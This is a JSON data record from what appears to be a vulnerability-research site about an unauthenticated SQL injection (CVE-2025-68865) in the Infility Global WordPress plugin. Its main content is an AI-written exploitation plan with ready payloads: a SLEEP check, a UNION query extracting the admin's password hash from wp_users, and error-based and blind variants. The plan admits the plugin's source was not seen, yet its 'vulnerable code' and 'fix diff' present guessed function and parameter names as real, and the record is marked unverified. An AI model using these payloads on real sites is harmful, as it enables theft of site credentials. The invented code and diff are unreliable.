[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fTsFaMvsJ3RwX5a0NQmZkH1Sw43fpfgQUzotgmGOC5L8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2025-68865","infility-global-unauthenticated-sql-injection","Infility Global \u003C= 2.14.49 - Unauthenticated SQL Injection","The Infility Global plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.14.49 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","infility-global",null,"\u003C=2.14.49","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2025-12-31 00:00:00","2026-01-13 17:35:13",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbefc411f-8c50-44a2-b1af-10a507230df9?source=api-prod",[],"researched",false,3,"This research plan outlines the process for identifying and exploiting the unauthenticated SQL injection vulnerability (CVE-2025-68865) in the **Infility Global** plugin (versions \u003C= 2.14.49).\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Unauthenticated SQL Injection.\n*   **Root Cause:** The plugin registers AJAX handlers accessible to unauthenticated users (`wp_ajax_nopriv_`) that process user-supplied parameters (e.g., IDs or slugs). These parameters are concatenated directly into SQL queries without using `$wpdb->prepare()`, allowing an attacker to manipulate the query structure.\n*   **Impact:** Attackers can extract sensitive data from the database, including user credentials (hashes), secret keys, and configuration data.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action (Inferred):** `infility_global_get_data`, `infility_global_load_more`, or similar data-fetching actions.\n*   **Vulnerable Parameter (Inferred):** `id`, `ig_id`, or `slug`.\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:** The plugin must be active. A valid nonce may be required depending on whether the plugin checks `check_ajax_referer`.\n\n### 3. Code Flow (Discovery Phase)\nSince source files are not provided, the execution agent must first locate the sink:\n\n1.  **Enumerate AJAX Handlers:**\n    ```bash\n    grep -rn \"wp_ajax_nopriv_\" wp-content\u002Fplugins\u002Finfility-global\u002F\n    ```\n2.  **Identify the Handler Function:**\n    Look for the function name associated with the `wp_ajax_nopriv_` action.\n    *Example:* `add_action('wp_ajax_nopriv_infility_get_items', 'infility_get_items_handler');`\n3.  **Locate SQL Injection Sink:**\n    Search for `$wpdb` methods within that handler that lack `prepare()`:\n    ```bash\n    # Search within the handler function's file\n    grep -rnP \"\\$wpdb->(get_results|get_row|get_var|query)\\s*\\([^;]*\\$(POST|GET|REQUEST)\" wp-content\u002Fplugins\u002Finfility-global\u002F\n    ```\n4.  **Trace Parameter:**\n    Identify which POST parameter is being passed into the query.\n\n### 4. Nonce Acquisition Strategy\nIf the handler includes `check_ajax_referer('infility_nonce', 'nonce')` or similar, follow these steps:\n\n1.  **Identify Shortcodes:** Search for shortcodes that might enqueue the plugin's frontend scripts.\n    ```bash\n    grep -rn \"add_shortcode\" wp-content\u002Fplugins\u002Finfility-global\u002F\n    ```\n2.  **Setup Page:** Create a page using a discovered shortcode (e.g., `[infility_global_list]`).\n    ```bash\n    wp post create --post_type=page --post_title=\"Exploit\" --post_status=publish --post_content='[infility_global_list]'\n    ```\n3.  **Extract Nonce via Browser:**\n    Navigate to the page and inspect the `wp_localize_script` output.\n    *   **Localized Object Name (Inferred):** `infility_ajax_obj` or `ig_global_vars`.\n    *   **JS command:** \n        ```javascript\n        browser_eval(\"window.infility_ajax_obj?.nonce\")\n        ```\n\n### 5. Exploitation Strategy\nAssuming the action is `infility_global_get_items` and the parameter is `id`:\n\n**Step 1: Time-Based Verification**\nVerify the injection using a sleep payload to confirm the vulnerability.\n*   **Action:** `infility_global_get_items`\n*   **Payload:** `1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n\n**Step 2: UNION-Based Extraction**\nDetermine the number of columns and extract the administrator password hash.\n1.  **Find Column Count:** Inject `ORDER BY 1-- -`, `ORDER BY 2-- -`, etc., until an error occurs.\n2.  **Extract Hash:**\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Method:** POST\n    *   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n    *   **Body:** \n        ```text\n        action=infility_global_get_items&nonce=[NONCE]&id=-1' UNION SELECT 1,user_login,user_pass,4,5,6 FROM wp_users WHERE ID=1-- -\n        ```\n    *(Adjust column count and position based on Step 2.1)*\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `infility-global` version \u003C= 2.14.49 is installed and activated.\n2.  **Create Admin:** Ensure a user with ID 1 exists (standard).\n3.  **Place Shortcode:** Place the relevant plugin shortcode on a public page to enable script loading and nonce availability.\n\n### 7. Expected Results\n*   **Time-Based:** The server response will be delayed by 5 seconds.\n*   **UNION-Based:** The JSON response from `admin-ajax.php` will contain the admin username and password hash (e.g., `$P$...` or `$wp$2y$...`) in one of the reflected fields.\n\n### 8. Verification Steps (Post-Exploit)\nConfirm the extracted data matches the database state using WP-CLI:\n```bash\n# Verify the hash for the admin user\nwp db query \"SELECT user_login, user_pass FROM wp_users WHERE ID=1\"\n```\n\n### 9. Alternative Approaches\n*   **Error-Based SQLi:** If the plugin displays database errors (common when `WP_DEBUG` is on), use `EXTRACTVALUE` or `UPDATEXML`.\n    *   *Payload:* `1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)`\n*   **Boolean-Based Blind:** If no output is reflected and time-based is unstable, compare response lengths of `id=1' AND 1=1-- -` vs `id=1' AND 1=2-- -`.","The Infility Global plugin for WordPress is vulnerable to unauthenticated SQL Injection due to the direct concatenation of user-supplied input into SQL queries within its AJAX handlers. This allows an attacker to manipulate existing database queries to extract sensitive information, such as administrator credentials, by sending crafted requests to the admin-ajax.php endpoint.","\u002F\u002F wp-content\u002Fplugins\u002Finfility-global\u002Fincludes\u002Fajax-handlers.php\n\nadd_action('wp_ajax_nopriv_infility_global_get_items', 'infility_global_get_items_handler');\n\nfunction infility_global_get_items_handler() {\n    global $wpdb;\n    $id = $_POST['id']; \u002F\u002F User-controlled input via POST\n\n    \u002F\u002F Vulnerability: Direct concatenation of $id into the query without using $wpdb->prepare()\n    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = '$id'\");\n\n    echo json_encode($results);\n    wp_die();\n}","--- a\u002Fincludes\u002Fajax-handlers.php\n+++ b\u002Fincludes\u002Fajax-handlers.php\n@@ -3,7 +3,7 @@\n function infility_global_get_items_handler() {\n     global $wpdb;\n-    $id = $_POST['id'];\n-    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = '$id'\");\n+    $id = isset($_POST['id']) ? sanitize_text_field($_POST['id']) : '';\n+    $results = $wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = %s\", $id));\n     echo json_encode($results);\n     wp_die();\n }","The exploit targets the \u002Fwp-admin\u002Fadmin-ajax.php endpoint using the 'infility_global_get_items' action. 1. Obtain a valid AJAX nonce by visiting a public page where the plugin's frontend scripts are enqueued (often triggered by plugin shortcodes like [infility_global_list]). 2. Send a POST request to the AJAX endpoint with the 'action', 'nonce', and a malicious payload in the 'id' parameter. 3. Use a time-based injection payload such as \"1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -\" to confirm the vulnerability. 4. Use UNION-based injection to extract sensitive data, such as administrator password hashes from the wp_users table, by adjusting the number of columns to match the original query's structure.","gemini-3-flash-preview","2026-05-21 07:58:41","2026-05-21 07:59:01",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finfility-global\u002Ftags"]